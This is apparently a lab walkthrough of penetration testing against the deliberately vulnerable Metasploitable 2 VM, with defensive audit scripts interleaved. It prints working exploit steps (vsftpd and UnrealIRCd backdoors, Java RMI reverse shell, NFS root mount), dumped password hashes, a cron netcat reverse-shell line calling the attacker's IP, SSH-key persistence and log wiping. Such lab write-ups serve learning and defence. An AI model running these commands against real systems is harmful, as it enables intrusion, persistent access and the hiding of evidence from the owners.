Metasploitable is a virtual machine that is intentionally vulnerable so you can test penetration tools and practice common penetration techniques on it. I will go through the 5 phases of a penetration test (except reconnaissance) and talk about some of the tools and types of exploits I used. Metasploitable 2 has many other vulnerabilities, but I will only cover a few, which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.
Kali Linux Machine
Scanning and Enumeration
Scanning with nmap
Using nmap to do a version scan with OS detection shows each open service and the version it is running. According to nmap, the host is running Linux 2.6.X as well.
root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST
Nmap scan report for 192.168.182.150
Host is up (0.012s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37131/tcp open  nlockmgr    1-4 (RPC #100021)
38108/tcp open  unknown
53107/tcp open  mountd      1-3 (RPC #100005)
54247/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:13:C8:C2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
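The same scan output is what a defender would triage when auditing a host. The following is an added example, not part of the original post: it parses `nmap -sV` table rows and maps them to the exposures this walkthrough goes on to use. The rule names and the rule set are assumptions of this example, and the sample rows are a constructed subset of the output above.

```python
import re

# Constructed sample: a subset of the rows from the scan output above.
SAMPLE_SCAN = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
513/tcp   open  login?
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
5900/tcp  open  vnc         VNC (protocol 3.3)
6667/tcp  open  irc         Unreal ircd
"""

ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Illustrative rules (assumed names), one per exposure covered in the walkthrough.
RULES = [
    ("verify-release-integrity", lambda r: "vsftpd 2.3.4" in r["version"]),
    ("verify-release-integrity", lambda r: "unreal ircd" in r["version"].lower()),
    ("cleartext-remote-login", lambda r: r["service"] in {"telnet", "exec", "login", "shell"}),
    ("unauthenticated-root-shell", lambda r: "root shell" in r["version"].lower()),
    ("rmi-registry-exposed", lambda r: r["service"] == "rmiregistry"),
    ("nfs-exposed", lambda r: r["service"] == "nfs"),
    ("vnc-exposed", lambda r: r["service"] == "vnc"),
]

def parse_scan(text):
    """Return one dict per open port found in `nmap -sV` table rows."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m or m.group(3) != "open":
            continue  # header line, closed/filtered ports, free text
        rows.append({
            "port": int(m.group(1)),
            "proto": m.group(2),
            "service": m.group(4).rstrip("?"),  # nmap appends '?' when it is guessing
            "version": m.group(5).strip(),
        })
    return rows

def triage(rows):
    """Map each port number to the list of rule names it trips."""
    findings = {}
    for r in rows:
        hits = [name for name, pred in RULES if pred(r)]
        if hits:
            findings[r["port"]] = hits
    return findings

if __name__ == "__main__":
    for port, hits in sorted(triage(parse_scan(SAMPLE_SCAN)).items()):
        print(port, ", ".join(hits))
```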
Banner grabbing (port 23)
This was very interesting! I was able to find the username and password credentials (msfadmin/msfadmin) with a simple banner grab using telnet.
root@kali:~# telnet 192.168.182.150
Trying 192.168.182.150...
Connected to 192.168.182.150.
Escape character is '^]'.
                _                  _       _ _        _     _      ____
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login:
Banner grabbing the web server (port 80)
Using netcat I found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). Browsing to http://192.168.182.150, I also found services like Damn Vulnerable Web App, Mutillidae, phpMyAdmin, Wiki, and WebDAV running on the victim machine, as well as the username msfadmin and password msfadmin credentials to log in.
VNC on port 5900
In the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it, but it requires a password to get in. I will brute-force my way in later in this pentest.
root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Reading password failed
root@kali:~#
VSFTPD v2.3.4 Backdoor (Port 21)
According to nmap, Metasploitable is running vsftpd 2.3.4. A backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011, and it was removed on July 3rd 2011. We are going to check whether this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we then connect to port 6200 with Netcat and get a root shell, the backdoor is present. The Metasploit Framework also has a module for this exploit.
root@kali:~# ftp 192.168.182.150
Connected to 192.168.182.150.
220 (vsFTPd 2.3.4)
Name (192.168.182.150:root): backdoor:)
331 Please specify the password.
Password:

root@kali:~# nc 192.168.182.150 6200
whoami
root
id
uid=0(root) gid=0(root)
ls -l
total 85
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13800 Feb  4 00:27 dev
drwxr-xr-x  95 root root  4096 Feb  4 00:30 etc
drwxr-xr-x   6 root root  4096 Apr 16  2010 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 10147 Feb  4 00:30 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 108 root root     0 Feb  4 00:27 proc
drwxr-xr-x  13 root root  4096 Feb  4 00:30 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Feb  4 00:27 sys
drwxrwxrwt   4 root root  4096 Feb  4 00:30 tmp
drwxr-xr-x  12 root root  4096 Apr 27  2010 usr
drwxr-xr-x  15 root root  4096 May 20  2012 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)
Searching for a Java exploit, I came across this on the Rapid7 Vulnerability & Exploit Database:
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      192.168.182.150  yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(java_rmi_server) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444
[*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw
[*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw
[*] Server started.
[*] 192.168.182.150:1099 - Sending RMI Header...
[*] 192.168.182.150:1099 - Sending RMI Call...
[*] 192.168.182.150 java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.182.150
[*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter >
Ingreslock (Port 1524)
Ingreslock is used to lock parts of an Ingres database; however, it is also used as a backdoor set by trojans to get into a system. A simple netcat connection is all we need to exploit this.
root@kali:~# nc 192.168.182.150 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#
NFS Share misconfiguration (Port 2049)
NFS (Network File Share) is a Unix service used to share resources across the network. System administrators need to pay attention when configuring it, because a misconfiguration can present a vulnerability like the one shown here. The nmap scan showed that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I was able to discover that the root directory was being shared! Naturally, I went on to exploit this, as shown below.
Showing NFS server’s export list
root@kali:~# showmount -e 192.168.182.150
Export list for 192.168.182.150:
/ *
root@kali:~#
Next I make a mount point in order to view all the contents of the server. I also run the df -h command to show that we have access to the root directory of the server. In the post-exploitation phase I will add an SSH key to the server’s authorized_keys file. More will be explained later in this guide.
root@kali:~# mkdir /temp/root_access2Metaploitable/
root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock
root@kali:~# df -h
Filesystem         Size  Used Avail Use% Mounted on
udev                10M     0   10M   0% /dev
tmpfs              1.6G  9.1M  1.6G   1% /run
/dev/sda1           57G   17G   38G  31% /
tmpfs              3.9G  212K  3.9G   1% /dev/shm
tmpfs              5.0M     0  5.0M   0% /run/lock
tmpfs              3.9G     0  3.9G   0% /sys/fs/cgroup
tmpfs              798M  8.0K  798M   1% /run/user/132
tmpfs              798M   12K  798M   1% /run/user/0
/dev/sr0           3.1G  3.1G     0 100% /media/cdrom0
192.168.182.150:/  7.0G  1.5G  5.2G  22% /temp/root_access2Metaploitable
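On the server side, the misconfiguration lives in /etc/exports. The following is an added example, not part of the original post: a small audit of exports(5) entries that flags the properties seen above (the filesystem root exported, to everyone, writable by remote root). Both sample lines are constructed; the first is an assumption consistent with the `/ *` export list and the later write into /root, the second is a tightened alternative.

```python
import re

# Constructed /etc/exports content (assumptions, not copied from the VM).
WEAK = "/ *(rw,sync,no_root_squash,no_subtree_check)\n"
HARDENED = (
    "# read-only share for one subnet, remote root mapped to nobody\n"
    "/srv/share 192.168.182.0/24(ro,sync,root_squash,no_subtree_check)\n"
)

CLIENT = re.compile(r"^([^()]*)(?:\(([^)]*)\))?$")

def parse_exports(text):
    """Yield (path, client, options) per client entry. Quoted paths are not handled."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients or ["*"]:      # a bare path is treated as "everyone" here
            m = CLIENT.match(tok)
            if not m:
                continue
            client = m.group(1) or "*"    # "(rw)" with no host means all hosts
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, client, opts

def audit_exports(text):
    """Return [(path, client, [issues])] for entries with at least one issue."""
    findings = []
    for path, client, opts in parse_exports(text):
        issues = []
        if path == "/":
            issues.append("exports-filesystem-root")
        if client == "*":
            issues.append("world-accessible")
        if "no_root_squash" in opts:      # remote uid 0 stays uid 0 on the server
            issues.append("no_root_squash")
        if "rw" in opts:                  # the default is ro
            issues.append("writable")
        if issues:
            findings.append((path, client, issues))
    return findings

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_exports(text))
```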
Bruteforcing Vncviewer Login Credentials (Port 5900)
Using Metasploit’s auxiliary module “auxiliary/scanner/vnc/vnc_login”, I brute-forced the victim and got the password “password”. With this I was able to go back and run vncviewer again with the correct credentials and get not only a GUI but also a root shell on the system!
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150
RHOSTS => 192.168.182.150
msf auxiliary(vnc_login) > run

[*] 192.168.182.150:5900 - Starting VNC login sweep
[!] No active DB -- Credential data will not be saved!
[+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_login) >

root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Let's use the Metasploit Framework with the exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit this backdoor.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.182.147:4444
[*] Connected to 192.168.182.150:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ce3SW1J9SQ4K3cOX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ce3SW1J9SQ4K3cOX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600

id
uid=0(root) gid=0(root)
whoami
root
Getting the usernames and passwords from the Victim
When you have a reverse shell, you can use the cat command to show the contents of the /etc/shadow file. This displays the password hashes for each username. With further investigation, you can tell that these are MD5 (Unix) password hashes.
root@metasploitable:/# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
root@metasploitable:/#
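The "further investigation" is reading the scheme identifier in the second field: `$1$` marks md5crypt. The following is an added example, not part of the original post, of an audit that classifies each account's hash scheme and lists logins still protected by a weak one. The sample lines are constructed with placeholder salts and digests, and the function names are assumptions of this example.

```python
# Constructed shadow(5) lines; salts and digests are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$1$SALTSALT$PLACEHOLDERDIGEST:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
alice:$6$SALTSALT$PLACEHOLDERDIGEST:19000:0:99999:7:::
bob:!$1$SALTSALT$PLACEHOLDERDIGEST:19000:0:99999:7:::
legacy:abPLACEHOLDER:19000:0:99999:7:::
"""

# crypt(3) identifiers: the text between the first two '$' names the scheme.
SCHEMES = {
    "1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt",
}
WEAK = {"md5crypt", "descrypt"}

def classify(field):
    """Return (scheme, usable) for the password field of one shadow entry."""
    locked = field.startswith("!")        # leading '!' locks password login
    body = field.lstrip("!")
    if body in ("", "*"):
        if field == "":
            return "empty-password", True  # login with no password at all
        return "no-login", False           # '*' or '!' alone: no valid hash
    if body.startswith("$"):
        ident = body.split("$")[1]
        scheme = SCHEMES.get(ident, "unknown(" + ident + ")")
    else:
        scheme = "descrypt"                # no '$' prefix: traditional DES crypt
    return scheme, not locked

def audit_shadow(text):
    """Map username -> (scheme, usable)."""
    report = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
            report[fields[0]] = classify(fields[1])
    return report

def weak_logins(text):
    """Usernames that can log in with a password stored under a weak scheme."""
    return sorted(user for user, (scheme, usable) in audit_shadow(text).items()
                  if usable and scheme in WEAK)

if __name__ == "__main__":
    print(weak_logins(SAMPLE_SHADOW))
```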
Enable a Cron Job to run every 5 minutes
Using the line below we can set up a cron job that runs every 5 minutes and uses Netcat to return a root shell to us. Open /etc/crontab on the Linux victim and paste the line below at the end of the file. Save the file, exit, and restart the cron service by entering service cron restart. Now all you have to do is set up a Netcat listener on your Kali machine to pick up the shell.
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
This will set up the listener to grab the shell
nc -lvp 12345
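A crontab entry like the one above is exactly what a host review looks for. The following is an added example, not part of the original post: it parses the system crontab format (five time fields, user, command) and flags commands that hand a shell to a network connection. The rule names and patterns are assumptions of this example; the sample file is constructed, with the last line taken from the walkthrough.

```python
import re

# Constructed /etc/crontab; only the last entry comes from the walkthrough.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         backup  /usr/local/bin/sync-backups
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
"""

# Illustrative patterns (assumed), not an exhaustive list.
SUSPICIOUS = [
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[ec](?:\s|$)")),
    ("dev-tcp-redirect", re.compile(r"/dev/(?:tcp|udp)/")),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_crontab(text):
    """Yield (line_no, schedule, user, command) for each job in a system crontab."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):              # @reboot, @hourly, ...
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            sched, user, cmd = parts
        else:
            parts = line.split(None, 6)       # 5 time fields, user, command
            if len(parts) < 7:
                continue
            sched, user, cmd = " ".join(parts[:5]), parts[5], parts[6]
        yield n, sched, user, cmd

def audit_crontab(text):
    """Return [(line_no, user, [rule names])] for jobs matching a pattern."""
    findings = []
    for n, _sched, user, cmd in parse_crontab(text):
        hits = [name for name, rx in SUSPICIOUS if rx.search(cmd)]
        if hits:
            findings.append((n, user, hits))
    return findings

if __name__ == "__main__":
    for n, user, hits in audit_crontab(SAMPLE_CRONTAB):
        print("line", n, "runs as", user, "->", ", ".join(hits))
```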
Adding a SSH key on the Server for future use
Since we have access to the server’s SSH keys, I will generate my own SSH key using ssh-keygen and append it to Metasploitable’s authorized_keys file using the cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys command.
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali
The key's randomart image is:
+---[RSA 2048]----+
| |
| |
| |
| |
| S . . |
| = oE. o |
| o.+o o..o|
| . =+..+.o..|
| .=*o........|
+-----------------+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys
We have now successfully authenticated to the server as the user root without needing a password. I can come back to this anytime without password authentication.
root@kali:~# ssh email@example.com
Last login: Sat Feb 4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~#
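An appended key is only visible to someone who compares authorized_keys against what should be there. The following is an added example, not part of the original post: it fingerprints every key in an authorized_keys file and reports those missing from an allowlist. The keys are constructed placeholders built in code (not usable keys), and the function names and allowlist are assumptions of this example.

```python
import base64
import binascii
import hashlib
import struct

def wire_blob(key_type, material):
    """Build an SSH public key blob: two length-prefixed strings."""
    return b"".join(struct.pack(">I", len(p)) + p for p in (key_type, material))

def fingerprint(blob):
    """SHA256 fingerprint in the form printed by current `ssh-keygen -l`."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

# Constructed placeholder keys (fixed bytes, not real key material).
ADMIN_BLOB = wire_blob(b"ssh-ed25519", b"\x01" * 32)
ADDED_BLOB = wire_blob(b"ssh-ed25519", b"\x02" * 32)
SAMPLE_AUTHORIZED_KEYS = (
    "# managed by configuration management\n"
    'from="192.168.182.0/24" ssh-ed25519 '
    + base64.b64encode(ADMIN_BLOB).decode() + " admin@workstation\n"
    "ssh-ed25519 " + base64.b64encode(ADDED_BLOB).decode() + " root@kali\n"
)

def parse_authorized_keys(text):
    """Yield (line_no, key_type, comment, blob). Options with quoted spaces are not handled."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tok = line.split()
        idx = next((i for i, t in enumerate(tok)
                    if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(tok):
            continue
        try:
            blob = base64.b64decode(tok[idx + 1], validate=True)
        except (binascii.Error, ValueError):
            continue                      # not a key line
        yield n, tok[idx], " ".join(tok[idx + 2:]), blob

def unexpected_keys(text, allowed_fingerprints):
    """Return [(line_no, comment, fingerprint)] for keys not in the allowlist."""
    return [(n, comment, fingerprint(blob))
            for n, _type, comment, blob in parse_authorized_keys(text)
            if fingerprint(blob) not in allowed_fingerprints]

if __name__ == "__main__":
    allowed = {fingerprint(ADMIN_BLOB)}
    for n, comment, fp in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, allowed):
        print("line", n, comment, fp)
```

The comment field is attacker-controlled, so the allowlist is keyed on the fingerprint rather than on names like root@kali.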
Clear Event Logs
Using kwrite, edit, vi, or another editor, open the file /var/log/messages. From there you can delete any entries related to when you compromised the system, or delete all the entries if you like.
Clearing terminal history
You can clear your current session’s bash history using the command history -c
You can also remove .bash_history file on the victim’s machine to remove all the history as well.
Metasploitable provides us with common vulnerabilities and gives us a VM on which we can test some penetration techniques; however, this is just a start for those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs located on Vulnhub and Pentester Labs.
Note: I will continue to add more to this guide over time. If you have any comments, questions, or other topics you would like me to cover, let me know.